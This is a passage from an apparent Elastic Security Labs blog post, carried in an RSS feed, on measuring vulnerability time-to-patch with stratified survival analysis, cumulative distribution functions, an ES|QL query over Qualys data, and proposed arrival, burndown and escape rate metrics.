<p>Stratified survival analysis takes the idea of survival curves one step further. Instead of looking at all vulnerabilities together in one big pool, it separates them into groups (or “strata”) based on some meaningful characteristic. In our analysis, we have stratified vulnerabilities by severity, asset criticality, environment, cloud provider, and team/division/organization. Each group gets its own survival curve, and in the example graph here we compare how quickly different vulnerability severities are remediated over time.</p>
<p>The benefit of this approach is that it exposes differences that would otherwise be hidden in the aggregate. If we only looked at the overall survival curve, we could only draw conclusions about remediation performance across the board. Stratification reveals whether different teams, environments, or severities are addressed faster than the rest, and in our case it confirms that the patch-everything strategy is indeed applied consistently. This level of detail is important for making targeted improvements, helping us understand not just how long remediation takes in general, but if and where real bottlenecks exist.</p>
<h3>How Fast Do Teams Act?</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/time-to-patch-metrics/image2.png" alt="" /></p>
<p>While the survival curve emphasizes how long vulnerabilities remain open, we can flip the perspective by using the cumulative distribution function (CDF) instead. The CDF focuses on how quickly vulnerabilities are patched, showing the proportion of vulnerabilities that have been remediated by a given point in time.</p>
<p>Our choice of plotting the CDF provides a clear picture of remediation speed; however, it’s important to note that this version includes only vulnerabilities that were patched within the observed time window. Unlike the survival curve, which we compute over a rolling 6-month cohort to capture full lifecycles, the CDF is computed month-over-month on items closed in that month [3].</p>
<p>As such, it tells us how quickly teams remediate vulnerabilities <strong>once they do so</strong>, and it doesn’t reflect how long unresolved vulnerabilities remain open. For example, we see that 83.2% of the vulnerabilities closed in the current month were resolved within 30 days of the first detection. This highlights patching velocity for recent, successful patches but does not account for longer-standing vulnerabilities that remain open and are likely to have longer time-to-patch durations. Therefore, we use the CDF for understanding short-term response behavior, whereas the full lifecycle dynamics are given by a combination of CDF alongside survival analysis: the CDF describes <em>how fast teams act</em> once they patch, whereas the survival curve shows <em>how long vulnerabilities truly last</em>.</p>
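<p>The closed-only empirical CDF at an SLO boundary is straightforward to compute; the helper and sample durations below are illustrative, not our production numbers:</p>

```python
def fraction_patched_within(days_to_patch, slo_days):
    """Empirical CDF at slo_days: the share of *closed* vulnerabilities
    that were remediated within the SLO window."""
    if not days_to_patch:
        return 0.0
    return sum(d <= slo_days for d in days_to_patch) / len(days_to_patch)

# Hypothetical durations for vulnerabilities closed this month:
closed = [3, 7, 12, 18, 25, 28, 29, 31, 45, 60]
print(fraction_patched_within(closed, 30))  # 0.7
```

<p>Because the input contains only closed items, this number describes velocity of successful patches; pairing it with the survival curve restores the view of what is still open.</p>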
<h2>Difference Between Survival Analysis and Mean/Median</h2>
<p>Wait, we said that survival analysis is better for analyzing time to patch because it avoids the impact of outliers. But in this example, mean/median and survival analysis provide similar results, so what is the added value? The reason is simple: we don’t have outliers in our production environments, since our patching process is fully automated and effective.</p>
<p>To demonstrate the impact on heterogeneous data, we’ll use an outdated example from a non-production environment that lacks automated patching.</p>
<p>ES|QL query:</p>
<pre><code class="language-sql">FROM qualys_vmdr.vulnerability_6months
  | WHERE elastic.environment == &quot;my-outdated-non-production-environment&quot;
  | WHERE qualys_vmdr.asset_host_detection.vulnerability.is_ignored == FALSE
  | EVAL vulnerability_age = DATE_DIFF(&quot;day&quot;, qualys_vmdr.asset_host_detection.vulnerability.first_found_datetime, qualys_vmdr.asset_host_detection.vulnerability.last_found_datetime)
  | STATS
      count=COUNT(*),
      count_closed_only=COUNT(*) WHERE qualys_vmdr.asset_host_detection.vulnerability.status == &quot;Fixed&quot;,
      mean_observed_so_far=AVG(vulnerability_age),
      mean_closed_only=AVG(vulnerability_age) WHERE qualys_vmdr.asset_host_detection.vulnerability.status == &quot;Fixed&quot;,
      median_observed_so_far=MEDIAN(vulnerability_age),
      median_closed_only=MEDIAN(vulnerability_age) WHERE qualys_vmdr.asset_host_detection.vulnerability.status == &quot;Fixed&quot;
</code></pre>
<table>
<thead>
<tr>
<th align="left"></th>
<th align="left">Observed so far</th>
<th align="left">Closed only</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Count</td>
<td align="left">833</td>
<td align="left">322</td>
</tr>
<tr>
<td align="left">Mean</td>
<td align="left">178.7 (days)</td>
<td align="left">163.8 (days)</td>
</tr>
<tr>
<td align="left">Median</td>
<td align="left">61 (days)</td>
<td align="left">5 (days)</td>
</tr>
<tr>
<td align="left">Median survival</td>
<td align="left">527 (days)</td>
<td align="left">N/A</td>
</tr>
</tbody>
</table>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/time-to-patch-metrics/image1.png" alt="" /></p>
<p>In this example, the mean and median yield very different results, and choosing a single representative metric can be challenging and potentially misleading. The survival analysis graph accurately represents our effectiveness in addressing vulnerabilities within this environment.</p>
<h2>Final Thoughts</h2>
<p>The benefits of using survival analysis come not only from more accurate measurement but also from the insights into the dynamics of patching behaviour, showing where bottlenecks occur, factors that affect patching velocity and whether it aligns with our SLO. From a technical integration perspective, the use of survival analysis as part of our operational workflows and reporting can be achieved with minimal additional changes to our current Elastic Stack setup: survival analysis can run on the same cadence as our patching cycle with the results being pushed back into Kibana for visualization. The definitive advantage is to pair our existing operational metrics with survival analysis for both long-term trends and short-term performance tracking.</p>
<p>Looking forward, we’re experimenting with additional new metrics like <strong>Arrival Rate</strong>, <strong>Burndown Rate</strong>, and <strong>Escape Rate</strong> that give us a way to move toward a more dynamic understanding of how vulnerabilities are really handled.</p>
<p><strong>Arrival Rate</strong> measures how quickly new vulnerabilities are entering the environment. Knowing that fifty new CVEs show up each month, for example, tells us what workload to expect before we even start measuring patches. So the arrival rate is a metric that describes not so much the backlog as the pressure applied to the system.</p>
<p><strong>Burndown Rate</strong> (trend) shows the other half of the equation: how quickly vulnerabilities are being remediated relative to how fast they arrive.</p>
<p><strong>Escape Rate</strong> adds yet another dimension by focusing on vulnerabilities that slip past the points where they should have been contained. In our context, an escape is a CVE that misses its patching window or exceeds an SLO threshold. An elevated escape rate doesn’t just show that vulnerabilities exist; it shows that the process designed to control them is failing, whether because patching cycles are too slow, automation is lacking, or compensating controls are not working as intended.</p>
<p>Together, the metrics create a better picture: arrival rate tells us how much new risk is being introduced; burndown trends show whether we are keeping pace with that pressure or being overwhelmed by it; escape rates expose where vulnerabilities persist despite planned controls.</p>
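<p>As a sketch of how these three metrics might be computed from monthly counts (the formulas are our illustrative reading of the definitions above, and all numbers are invented):</p>

```python
# Hypothetical monthly counts for one environment.
new_vulns_per_month = [50, 62, 48, 71]      # arrival-rate inputs
closed_vulns_per_month = [45, 60, 55, 80]   # burndown inputs
missed_slo_per_month = [4, 6, 3, 5]         # escapes: items closed past the SLO window

# Arrival rate: average pressure applied to the system per month.
arrival_rate = sum(new_vulns_per_month) / len(new_vulns_per_month)

# Burndown ratio: closed vs. arrived; > 1 means the backlog is shrinking.
burndown_ratio = sum(closed_vulns_per_month) / sum(new_vulns_per_month)

# Escape rate: share of closed items that missed their SLO.
escape_rate = sum(missed_slo_per_month) / sum(closed_vulns_per_month)

print(round(arrival_rate, 2), round(burndown_ratio, 2), round(escape_rate, 3))
```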
<p>[1]: An outlier in statistics is a data point that is very far from the central tendency (or far from the rest of the values in a dataset). For example, if most vulnerabilities are patched within 30 days, but one takes 600 days, that 600-day case is an outlier. Outliers can pull averages upward or downward in ways that don’t reflect the “typical” experience. In the patching context, these are the especially slow-to-patch vulnerabilities that sit open far longer than the norm. They may represent rare but important situations, like systems that can’t be easily updated, or patches that require extensive testing.</p>
<p>[2]: Note: The current 6-month dataset includes both all vulnerabilities that remain open at the end of the observation period (independent of how long ago they were first seen) and all vulnerabilities that were closed during the 6-month window. Despite this mixed cohort approach, survival curves from prior observation windows show consistent trends, particularly in the early part of the curve. The shape and slope over the first 30–60 days have proven remarkably stable across snapshots, suggesting that metrics like median time-to-patch and early-stage remediation behavior are not artifacts of the short observation window. While long-term estimates (e.g. the 90th percentile) remain incomplete in shorter snapshots, the conclusions drawn from these cohorts still reflect persistent and reliable patching dynamics.</p>
<p>[3]: We kept the CDF on a monthly cadence for operational reporting (throughput and SLO adherence for work completed during the current month), while the Kaplan-Meier uses a 6-month window to properly handle censoring and expose tail risk across the broader cohort.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/time-to-patch-metrics/Security Labs Images 7.jpg" length="0" type="image/jpg"/>
        </item>
    </channel>
</rss>